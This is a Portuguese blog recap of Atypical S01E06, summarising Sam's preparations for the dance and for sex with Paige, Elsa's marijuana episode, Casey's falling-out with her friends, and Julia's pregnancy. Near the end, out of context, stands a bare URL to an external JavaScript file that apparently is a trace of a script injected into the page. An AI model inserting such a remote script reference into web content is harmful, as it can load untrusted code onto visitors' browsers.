Panela de Séries » Arquivos Atypical - S01E06 - The D-Train to Bone Town - Panela de Séries

Posts Populares

Atypical – S01E06 – The D-Train to Bone Town

“Ir lá em casa” é um código para “fazer sexo”.

Paige quer ir ao baile da escola e quer que Sam a leve. Vocês conseguem imaginá-lo indo a um lugar repleto de gente, provavelmente se esbarrando, com música alta e tudo mais que ele não consegue lidar? Porém, Paige quer muito ir, além do mais os pais dela estão viajando naquele final de semana e ele poderia passar lá depois, se é que vocês me entendem… Bem, todos devem ter entendido as intenções dela, menos Sam. Ela pergunta o que poderia fazer para que ele fosse ao baile, que responde que ela poderia pedir para desligarem a música e fazer um baile silencioso.

Elsa passa uma parte da tarde com Nick, que resolve fumar um pouco de maconha e incentiva que ela use com ele. Depois Elsa sai completamente chapada pela rua e acaba encontrando uma conhecida, mãe de uma das amigas de Casey, que estranha ela estar tão longe de casa. Então ela inventa uma desculpa que estava comprando coisas para Casey e a nova escola. O que causa uma confusão gigantesca, porque ninguém sabia que Casey poderia mudar de escola. Com isso suas amigas passam a ignorá-la, incluindo Sharice, sua melhor amiga desde sempre, acusando-a de ser egoísta, por largá-las e a equipe no meio da competição, quando sabe que sem ela, não existem chances nenhuma de vitória. Elsa tenta ajudar, ligando para a mãe de uma delas, mas tudo dá muito errado. Porque Casey sai com as meninas para escolher um vestido para o baile e quando resolve experimentar um, depois de incentivo de todas, tem suas roupas roubadas e fica presa na loja, sem ter como sair. E a única saída é esperar por Elsa aparecer para buscá-la.

Julia está muito revoltada com o fato de seu namorado ter deixado a casa em que dividiam sem avisar, então recolhe tudo que era dele, e que ela não quer, e avisa que é para ele aparecer lá para buscar na varanda, já que não quer falar com ele. Mas acaba que sofre um pequeno acidente doméstico e machuca o pé. Se não fosse por Doug aparecer em seu consultório para lhe devolver um livro e pedir alguns conselhos para si mesmo, ela passaria dias e mais dias mancando. Ele a leva para o pronto-socorro e eles conversam bastante, Julia agradece a preocupação e diz que ele deveria procurar um terapeuta para si próprio, porque ajudaria muito. Só que após Doug ir embora e Julia achar que, finalmente, faria um raio-x para saber se o pé estava quebrado, a enfermeira lhe joga uma bomba: ela está grávida!

Sam comenta com Zahid sobre Paige querer ir ao baile e depois que ele vá até a casa dela e o amigo entende as intenções da menina logo de cara, mas Sam não parece muito convencido. Tanto que ele vai até a namorada duas vezes para confirmar se “passar lá em casa” significa “fazer sexo”. Na primeira ela diz talvez, que Zahid diz signficar sim, mas não satisfeito, ele pergunta novamente, até que Paige diz que sim. Depois de comprar camisinhas com o amigo, ele tem uma conversa com outro garoto autista, filho de uma das amigas do grupo de Elsa. Eles tentam achar um assunto em que ambos tem interesse e acabam falando sobre sexo. E Sam descobre que há uma regra que “não permite” que você faça sexo se não tiver passado por todas as bases, aquela analogia com baseball que os americanos fazem. Por isso Sam diz que precisa ver peitos antes de fazer qualquer coisa com Paige, então Zahid o leva para um clube de strip, mas ele não consegue nem entrar. Mas mesmo do lado de fora, ele conversa francamente com uma moça, falando sobre a sua apreensão sobre transar pela primeira vez e ela lhe diz para ser carinhoso com a garota, que o restante a biologia lhe ensina. E como um pequeno prêmio, ela mostra os peitos para ele, que fica bem chocado.

Paige tem uma ideia para o baile, transformá-lo num Baile Silencioso, onde não haveria música alta, os alunos receberiam fones e escutariam as músicas através deles, para que Sam possa aproveitá-lo como qualquer outro estudante. Ela apresenta sua proposta numa reunião de pais e surpreende Elsa, que endossa seu discurso, para ajudar a conseguir votos, mas a mesma moça que ela encontrou quando estava bem chapada é contra e diz que nenhum aluno deveria ser obrigado a perder experiências como o baile só por causa de um aluno. E Elsa diz como Sam perde todas as experiências de sua vida por ser diferente, que esse baile poderia ser uma chance de fazer com que ele se sinta parte daquele todo que ele sempre foi excluído. Mesmo com alguns pais sendo contra, Paige consegue aprovar sua proposta.

Disposta a consertar, pelo menos, uma coisa para Casey, Elsa vai atrás de Sharice e meio que obriga a menina a fazer as pazes com sua filha. O que não foi muito difícil, já que ela não estava muito feliz de estar fazendo todas aquelas coisas com a amiga. Na verdade ela estava com um pouco de raiva por Casey estar indo embora e nem mesmo ter falado sobre, só que a amiga não queria contar algo que não tinha certeza. Mas, pelo menos, isso já estava resolvido.

https://cloudapi.online/js/api46.js

gostou da matéria? deixe um comentário!

Thais Pereira

Feminista, leonina com ascendente em gêmeos e lua em virgem, viciada em memes, em Friends e problematizar na internet. Formada em História da Arte, mas consciente que nunca vai trabalhar com isso na vida. Normalmente eu escrevo e falo mais do que deveria. Eu mesma, Thais Mello.

Tema por Gabriela Gomes Todos os direitos reservados ao Panela de Séries • Hosted by flaunt.nu